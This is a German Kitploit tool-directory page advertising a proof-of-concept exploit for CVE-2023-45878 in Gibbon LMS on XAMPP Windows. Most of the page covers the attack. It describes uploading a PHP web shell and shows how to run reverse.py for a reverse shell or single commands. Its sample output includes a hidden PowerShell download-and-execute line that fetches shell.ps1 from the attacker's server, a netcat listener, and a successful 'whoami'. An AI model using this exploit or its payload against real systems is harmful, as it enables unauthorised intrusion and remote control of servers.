Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-45878-POC — CVE-2023-45878 PoC für gibbon LMS auf xampp windows | Kitploit
Tools/GitHubGitHub/pauldhaes/cve-2023-45878-poc
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and Control
GitHubpauldhaes/cve-2023-45878-poc

CVE-2023-45878-POC

CVE-2023-45878 PoC für gibbon LMS auf xampp windows

Repository anzeigen
1vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2023-45878-POC

CVE-2023-45878-PoC für Gibbon LMS unter XAMPP Windows. Laden Sie eine Webshell namens shell.php für die Befehlsausführung (Command Injection) hoch. Für die Reverse Shell wird ein PowerShell-Reverse-Shell-PS1-Skript namens shell.ps1 hochgeladen, das mithilfe der shell.php auf das Zielsystem übertragen wird.

Anforderungen

Python3 Requests-Python3-Modul netcat

root@kitploit:~
pip3 install requests

Virtuelle Umgebung

root@kitploit:~
mkdir CVE-2023-45878
cd CVE-2023-45878
python3 -m venv CVE
source CVE/bin/activate
cd ..
pip3 install requests

Verwendung

Getestet auf Gibbon LMS, das unter XAMPP Windows ohne aktivierten Virenschutz lief. Das Ziel kann über die Login-Seite von Gibbon gefunden werden, z. B. http://gibbon-example/Gibbon-LMS/

Reverse Shell

root@kitploit:~
python3 reverse.py --reverse-shell -target_url http://target -ip IP -port REV-PORT -srvport SRVPORT

Ergebnis

root@kitploit:~
[+] PHP shell uploaded successfully to http://target/shell.php
[+] PowerShell reverse shell script saved to: shell.ps1
[+] The shell is now hosted at shell.ps1
Starting reverse shell listener in background...
Starting netcat listener on ip:REV-PORT...
[+] HTTP server running in the background on port SRVPORT
[+] Executing PHP shell to download and execute shell.ps1
Executing: http://target/shell.php?cmd=powershell%20-nop%20-w%20hidden%20-c%20IEX%20%28New-Object%20Net.WebClient%29.DownloadString%28%27http%3A//IP%3ASRVPORT/shell.ps1%27%29
[+] HTTP server started on http://0.0.0.0:SRVPORT/
TARGET-IP - - [20/Mar/2025 12:59:11] "GET /shell.ps1 HTTP/1.1" 200 -
Connection from TARGET-IP

PS C:\xampp\htdocs\Gibbon-LMS>

Einzelner Befehl

root@kitploit:~
python3 reverse.py --single -target_url http://target -command whoami

Ergebnis

root@kitploit:~
[+] PHP shell uploaded successfully to http://target/shell.php
[+] Executing PHP command
Executing: http://target/shell.php?whoami
[+] Command executed successfully pres enter
vuln\w.webservice

Danksagungen

https://herolab.usd.de/security-advisories/usd-2023-0025/

Tool herunterladen